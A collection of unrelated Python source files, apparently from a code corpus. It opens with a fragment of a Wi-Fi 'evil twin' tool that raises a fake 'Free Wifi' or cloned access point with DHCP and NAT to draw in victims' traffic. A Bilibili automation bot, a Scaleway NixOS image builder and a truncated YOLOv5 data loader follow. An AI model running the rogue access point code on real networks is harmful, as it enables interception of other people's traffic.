install = raw_input('['+T+'*'+W+'] isc-dhcp-server not found in /usr/sbin/dhcpd, install now? [y/n] ')
if install == 'y':
os.system('apt-get -y install isc-dhcp-server')
else:
sys.exit('['+R+'-'+W+'] isc-dhcp-server not found in /usr/sbin/dhcpd')
def iwconfig():
monitors = []
interfaces = {}
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
#ignore_iface = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]|at[0-9]', line)
#if not ignore_iface: # Isn't wired or at0 tunnel
iface = line[:line.find(' ')] # is the interface name
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def rm_mon():
monitors, interfaces = iwconfig()
for m in monitors:
if 'mon' in m:
Popen(['airmon-ng', 'stop', m], stdout=DN, stderr=DN)
else:
Popen(['ifconfig', m, 'down'], stdout=DN, stderr=DN)
Popen(['iw', 'dev', m, 'mode', 'managed'], stdout=DN, stderr=DN)
Popen(['ifconfig', m, 'up'], stdout=DN, stderr=DN)
def internet_info(interfaces):
'''return the internet connected iface'''
inet_iface = None
proc = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
def_route = proc.communicate()[0].split('\n')#[0].split()
for line in def_route:
if 'default via' in line:
line = line.split()
inet_iface = line[4]
ipprefix = line[2][:2] # Just checking if it's 192, 172, or 10
if inet_iface:
return inet_iface, ipprefix
else:
#cont = False
#while not cont:
# cont = raw_input('['+R+'-'+W+'] No active internet connection found. AP will be without internet. Hit [c] to continue: ')
sys.exit('['+R+'-'+W+'] No active internet connection found. Exiting')
def AP_iface(interfaces, inet_iface):
for i in interfaces:
if i != inet_iface:
return i
def iptables(inet_iface):
global forw
os.system('iptables -X')
os.system('iptables -F')
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
os.system('iptables -t nat -A POSTROUTING -o %s -j MASQUERADE' % inet_iface)
with open('/proc/sys/net/ipv4/ip_forward', 'r+') as ipf:
forw = ipf.read()
ipf.write('1\n')
return forw
def start_monitor(ap_iface, channel):
proc = Popen(['airmon-ng', 'start', ap_iface, channel], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if "monitor mode enabled" in line:
line = line.split()
mon_iface = line[4][:-1]
return mon_iface
def get_mon_mac(mon_iface):
'''http://stackoverflow.com/questions/159137/getting-mac-address'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
return mac
def start_ap(mon_iface, channel, essid, args):
print '['+T+'*'+W+'] Starting the fake access point...'
if args.wpa:
Popen(['airbase-ng', '-P', '-Z', '4', '-W', '1', '-c', channel, '-e', essid, '-v', mon_iface, '-F', 'fakeAPlog'], stdout=DN, stderr=DN)
else:
Popen(['airbase-ng', '-c', channel, '-e', essid, '-v', mon_iface], stdout=DN, stderr=DN)
try:
time.sleep(6) # Copied from Pwnstar which said it was necessary?
except KeyboardInterrupt:
cleanup(None, None)
Popen(['ifconfig', 'at0', 'up', '10.0.0.1', 'netmask', '255.255.255.0'], stdout=DN, stderr=DN)
Popen(['ifconfig', 'at0', 'mtu', '1400'], stdout=DN, stderr=DN)
def sniffing(interface, cb):
'''This exists for if/when I get deauth working
so that it's easy to call sniff() in a thread'''
sniff(iface=interface, prn=cb, store=0)
def dhcp_conf(ipprefix):
config = ('default-lease-time 300;\n'
'max-lease-time 360;\n'
'ddns-update-style none;\n'
'authoritative;\n'
'log-facility local7;\n'
'subnet %s netmask 255.255.255.0 {\n'
'range %s;\n'
'option routers %s;\n'
'option domain-name-servers %s;\n'
'}')
if ipprefix == '19' or ipprefix == '17':
with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
# subnet, range, router, dns
dhcpconf.write(config % ('10.0.0.0', '10.0.0.2 10.0.0.100', '10.0.0.1', '8.8.8.8'))
elif ipprefix == '10':
with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
dhcpconf.write(config % ('172.16.0.0', '172.16.0.2 172.16.0.100', '172.16.0.1', '8.8.8.8'))
return '/tmp/dhcpd.conf'
def dhcp(dhcpconf, ipprefix):
os.system('echo > /var/lib/dhcp/dhcpd.leases')
dhcp = Popen(['dhcpd', '-cf', dhcpconf], stdout=PIPE, stderr=DN)
if ipprefix == '19' or ipprefix == '17':
os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
else:
os.system('route add -net 172.16.0.0 netmask 255.255.255.0 gw 172.16.0.1')
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
return mac
def cleanup(signal, frame):
with open('/proc/sys/net/ipv4/ip_forward', 'r+') as forward:
forward.write(forw)
os.system('iptables -F')
os.system('iptables -X')
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
os.system('pkill airbase-ng')
os.system('pkill dhcpd') # Dangerous?
rm_mon()
sys.exit('\n['+G+'+'+W+'] Cleaned up')
def main(args):
global ipf, mon_iface, ap_mac
if os.geteuid() != 0:
sys.exit('['+R+'-'+W+'] Run as root')
get_isc_dhcp_server()
channel = '1'
if args.channel:
channel = args.channel
essid = 'Free Wifi'
if args.essid:
essid = args.essid
monitors, interfaces = iwconfig()
rm_mon()
inet_iface, ipprefix = internet_info(interfaces)
ap_iface = AP_iface(interfaces, inet_iface)
if not ap_iface:
sys.exit('['+R+'-'+W+'] Found internet connected interface in '+T+inet_iface+W+'. Please bring up a wireless interface to use as the fake access point.')
ipf = iptables(inet_iface)
print '['+T+'*'+W+'] Cleared leases, started DHCP, set up iptables'
mon_iface = start_monitor(ap_iface, channel)
mon_mac1 = get_mon_mac(mon_iface)
if args.targeting:
hop = Thread(target=channel_hop, args=(mon_iface,))
hop.daemon = True
hop.start()
sniffing(mon_iface, targeting_cb)
channel, essid, ap_mac = copy_AP()
start_ap(mon_iface, channel, essid, args)
dhcpconf = dhcp_conf(ipprefix)
dhcp(dhcpconf, ipprefix)
while 1:
signal.signal(signal.SIGINT, cleanup)
os.system('clear')
print '['+T+'*'+W+'] '+T+essid+W+' set up on channel '+T+channel+W+' via '+T+mon_iface+W+' on '+T+ap_iface+W
print '\nDHCP leases log file:'
proc = Popen(['cat', '/var/lib/dhcp/dhcpd.leases'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
print line
time.sleep(1)
main(parse_args())
|
run.py | import sys
import signal
import threading
import asyncio
import aiohttp
import conf_loader
import notifier
import bili_sched
import printer
import bili_statistics
from console_cmd import ConsoleCmd
from tasks.login import LoginTask
from tasks.live_daily_job import (
HeartBeatTask,
OpenSilverBoxTask,
RecvDailyBagTask,
SignTask,
WatchTvTask,
SignFansGroupsTask,
SendGiftTask,
ExchangeSilverCoinTask
)
from tasks.main_daily_job import (
JudgeCaseTask,
BiliMainTask,
DahuiyuanTask
)
from tasks.manga_daily_job import (
ShareComicTask,
MangaSignTask,
)
from tasks.utils import UtilsTask
# 弹幕
from danmu.bili_danmu_monitor import DanmuPrinter, DanmuRaffleMonitor
from danmu.yj_monitor import TcpYjMonitorClient
from danmu import raffle_handler
# 实物抽奖
from substance.monitor_substance_raffle import SubstanceRaffleMonitor
from dyn.monitor_dyn_raffle import DynRaffleMonitor
loop = asyncio.get_event_loop()
dict_user = conf_loader.read_user()
dict_bili = conf_loader.read_bili()
dict_bilitv = conf_loader.read_bilitv()
dict_color = conf_loader.read_color()
dict_ctrl = conf_loader.read_ctrl()
dict_task = conf_loader.read_task()
printer.init_config(dict_color, dict_ctrl['print_control']['danmu'])
############################################################################
############################################################################
# 👇users 录入程序
async def init_users():
global_task_control = dict_task['global_task_control']
custom_task_control = dict_task['custom_task_control']
global_task_arrangement = dict_task['global_task_arrangement']
custom_task_arrangement = dict_task['custom_task_arrangement']
users = notifier.Users(global_task_control=global_task_control,
global_task_arrangement=global_task_arrangement,
dict_bili=dict_bili,
dict_bilitv = dict_bilitv,
force_sleep=bili_sched.force_sleep)
notifier.init(users=users)
assert dict_user['users'] # 这个 list 为 true 表示至少要有一个用户信息
for user_info in dict_user['users']:
username = user_info['username']
await notifier.add_user(user_info=user_info,
custom_task_control=custom_task_control.get(username, {}),
custom_task_arrangement=custom_task_arrangement.get(username, {}))
loop.run_until_complete(init_users())
############################################################################
############################################################################
# 👇重复任务录入程序
# 时间间隔为小时,同时每次休眠结束都会计时归零,重新从当前时间计算时间间隔
# 下面表示每隔多少小时执行一次
def add_daily_jobs():
bili_sched.add_daily_jobs(HeartBeatTask, every_hours=6)
bili_sched.add_daily_jobs(OpenSilverBoxTask, every_hours=6)
bili_sched.add_daily_jobs(RecvDailyBagTask, every_hours=3)
bili_sched.add_daily_jobs(SignTask, every_hours=6)
bili_sched.add_daily_jobs(WatchTvTask, every_hours=6)
bili_sched.add_daily_jobs(SignFansGroupsTask, every_hours=6)
bili_sched.add_daily_jobs(SendGiftTask, every_hours=2)
bili_sched.add_daily_jobs(ExchangeSilverCoinTask, every_hours=6)
bili_sched.add_daily_jobs(JudgeCaseTask, every_hours=0.75)
bili_sched.add_daily_jobs(BiliMainTask, every_hours=4)
bili_sched.add_daily_jobs(MangaSignTask, every_hours=6)
bili_sched.add_daily_jobs(ShareComicTask, every_hours=6)
bili_sched.add_daily_jobs(DahuiyuanTask, every_hours=6)
add_daily_jobs()
############################################################################
############################################################################
loop.run_until_complete(notifier.exec_task(LoginTask))
other_control = dict_ctrl['other_control']
area_ids = loop.run_until_complete(notifier.exec_func(UtilsTask.fetch_blive_areas))
area_duplicated = other_control['area_duplicated']
if area_duplicated:
area_ids *= 2
bili_statistics.init(area_num=len(area_ids), area_duplicated=area_duplicated)
default_roomid = other_control['default_monitor_roomid']
############################################################################
############################################################################
# 👇录入 monitors
# aiohttp sb session
async def init_monitors():
session = aiohttp.ClientSession()
monitors_ = []
# 弹幕打印功能
danmu_printer_ = DanmuPrinter(
room_id=default_roomid,
area_id=-1,
session=session)
# 弹幕抽奖监控
for area_id in area_ids:
monitor = DanmuRaffleMonitor(
room_id=0,
area_id=area_id,
session=session)
monitors_.append(monitor)
# yjmonitor 弹幕监控
yjmonitor_tcp_addr = other_control['yjmonitor_tcp_addr']
yjmonitor_tcp_key = other_control['yjmonitor_tcp_key']
if yjmonitor_tcp_key:
monitor = TcpYjMonitorClient(
key=yjmonitor_tcp_key,
url=yjmonitor_tcp_addr,
area_id=0)
monitors_.append(monitor)
if other_control['substance_raffle']:
monitors_.append(SubstanceRaffleMonitor())
if other_control['dyn_raffle']:
monitors_.append(DynRaffleMonitor(
should_join_immediately=other_control['join_dyn_raffle_at_once']))
return danmu_printer_, monitors_
danmu_printer, monitors = loop.run_until_complete(init_monitors())
############################################################################
############################################################################
bili_sched.init(monitors=monitors, sleep_ranges=dict_ctrl['other_control']['sleep_ranges'])
# 初始化控制台
if sys.platform != 'linux' or signal.getsignal(signal.SIGHUP) == signal.SIG_DFL:
console_thread = threading.Thread(
target=ConsoleCmd(loop, default_roomid, danmu_printer).cmdloop)
console_thread.start()
else:
console_thread = None
tasks = [monitor.run() for monitor in monitors]
other_tasks = [
bili_sched.run(),
raffle_handler.run(),
danmu_printer.run()
]
if other_tasks:
loop.run_until_complete(asyncio.wait(tasks + other_tasks))
loop.run_forever()
if console_thread is not None:
console_thread.join()
|
make-nixos-image.py | #!/usr/bin/env python3
import argparse
import datetime
import logging
import os
import pathlib
import queue
import re
import threading
import time
import paramiko
import scaleway.apis
import tenacity
logger = logging.getLogger(__name__)
def get_minimal_ubuntu(all_images, region, instance_type):
# find likely "base Ubuntu" images
images = [
image
for image in all_images
if "ubuntu" in image["name"].lower() and "distribution" in image["categories"]
]
# newly created entries first, to find the latest "major release"
images.sort(key=lambda image: image["creation_date"], reverse=True)
# get "public" version for each image
public_versions = [
version
for image in images
for version in image["versions"]
if version["id"] == image["current_public_version"]
]
# find disk images compatible with selected instance type and region
compatible_local_images = [
image
for version in public_versions
for image in version["local_images"]
if all(
(
(instance_type in image["compatible_commercial_types"]),
# HACK: backcompat region format (e.g. par1 from fr-par-1)
(image["zone"] in [region, "".join(region.split("-")[-2:])]),
)
)
]
if compatible_local_images:
return compatible_local_images[0]["id"]
raise Exception("Image not found")
@tenacity.retry(stop=tenacity.stop_after_attempt(30))
def ssh_connect(ip_address, private_key):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
client.connect(hostname=ip_address, username="root", pkey=private_key, timeout=5)
return client
def read_lines(streams):
q = queue.Queue()
def read_stream(stream):
for line in stream:
q.put(line)
threads = [
threading.Thread(target=read_stream, args=(stream,), daemon=True)
for stream in streams
]
for thread in threads:
thread.start()
while True:
try:
yield q.get(timeout=0.01)
except queue.Empty:
if not any(thread.is_alive() for thread in threads):
break
def flatten_whitespace(lines):
yield from filter(None, (re.sub("\s+", " ", l).strip() for l in lines))
def get_args(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument(
"--secret-key",
required=("SCW_SECRET_KEY" not in os.environ),
**(
{"default": os.environ["SCW_SECRET_KEY"]}
if "SCW_SECRET_KEY" in os.environ
else {}
),
)
parser.add_argument("--region", default="fr-par-1")
parser.add_argument("--instance-type", default="DEV1-M")
parser.add_argument("--bootstrap-disk-size", default=20)
return parser.parse_args(argv)
def main(argv=None):
args = get_args(argv)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s.%(msecs)03d :: [%(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
account = scaleway.apis.AccountAPI(auth_token=args.secret_key)
marketplace = scaleway.apis.API(base_url="https://api-marketplace.scaleway.com/")
compute = scaleway.apis.ComputeAPI(
auth_token=args.secret_key, base_url="https://api.scaleway.com/"
)
organization_id = account.query().organizations.get()["organizations"][0]["id"]
logger.info("Using organization ID %s", organization_id)
image_id = get_minimal_ubuntu(
marketplace.query().images.get()["images"], args.region, args.instance_type
)
logger.info("Using bootstrap (Ubuntu) image ID %s", image_id)
private_key = paramiko.ECDSAKey.generate(bits=256)
server = (
compute.query()
.instance.v1.zones(args.region)
.servers.post(
{
"organization": organization_id,
"name": "nixos-image-builder",
"image": image_id,
"commercial_type": args.instance_type,
"volumes": {
"0": {"size": 1_000_000_000 * args.bootstrap_disk_size},
"1": {
"name": "nixos-volume",
"organization": organization_id,
"volume_type": "l_ssd",
"size": 20_000_000_000,
},
},
"boot_type": "local",
"tags": [
"AUTHORIZED_KEY="
+ private_key.get_name()
+ "_"
+ private_key.get_base64()
],
}
)["server"]
)
logger.info("Provisioned instance %s", server["id"])
logger.info("Starting instance, this may take a bit...")
response = (
compute.query()
.instance.v1.zones(args.region)
.servers(server["id"])
.action.post({"action": "poweron"})
)
while True:
server = (
compute.query()
.instance.v1.zones(args.region)
.servers(server["id"])
.get()["server"]
)
if server["state"] == "running":
break
time.sleep(1)
logger.info("Instance running")
logger.info("Attempting to SSH to root@%s", server["public_ip"]["address"])
client = ssh_connect(server["public_ip"]["address"], private_key)
logger.info("Copying bootstrap files")
sftp = client.open_sftp()
bootstrap_file_path = pathlib.Path(__file__).parent / "bootstrap"
for bootstrap_file in bootstrap_file_path.glob("*"):
filename = bootstrap_file.relative_to(bootstrap_file_path)
source = str(bootstrap_file.resolve())
destination = str(pathlib.PurePosixPath("/tmp") / filename)
sftp.put(source, destination)
logger.info("Executing NixOS bootstrap")
_, stdout, stderr = client.exec_command("bash /tmp/nix-bootstrap.sh")
for line in flatten_whitespace(read_lines((stdout, stderr))):
logger.info(line)
status = stdout.channel.recv_exit_status()
logger.info("Bootstrap exited with status %d", status)
if status not in (-1, 0):
raise Exception("Failed to bootstrap")
logger.info("Waiting for instance to stop...")
while True:
server = (
compute.query()
.instance.v1.zones(args.region)
.servers(server["id"])
.get()["server"]
)
if server["state"] == "stopped in place":
break
time.sleep(1)
image_name = (
"nixos-" + datetime.datetime.utcnow().replace(microsecond=0).isoformat()
)
snapshot = (
compute.query()
.instance.v1.zones(args.region)
.snapshots.post(
{
"volume_id": server["volumes"]["1"]["id"],
"organization": organization_id,
"name": image_name,
}
)["snapshot"]
)
logger.info("Created snapshot ID %s", snapshot["id"])
logger.info("Waiting for snapshot to become available")
while True:
snapshot = (
compute.query()
.instance.v1.zones(args.region)
.snapshots(snapshot["id"])
.get()["snapshot"]
)
if snapshot["state"] == "available":
break
time.sleep(1)
image = (
compute.query()
.instance.v1.zones(args.region)
.images.post(
{
"name": image_name,
"root_volume": snapshot["id"],
"arch": server["arch"],
"organization": organization_id,
}
)["image"]
)
logger.info("Created NixOS image ID %s", image["id"])
logger.info("Deleting server ID %s", server["id"])
compute.query().instance.v1.zones(args.region).servers(server["id"]).action.post(
{"action": "terminate"}
)
logger.info("Done")
if __name__ == "__main__":
main()
|
datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
#print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
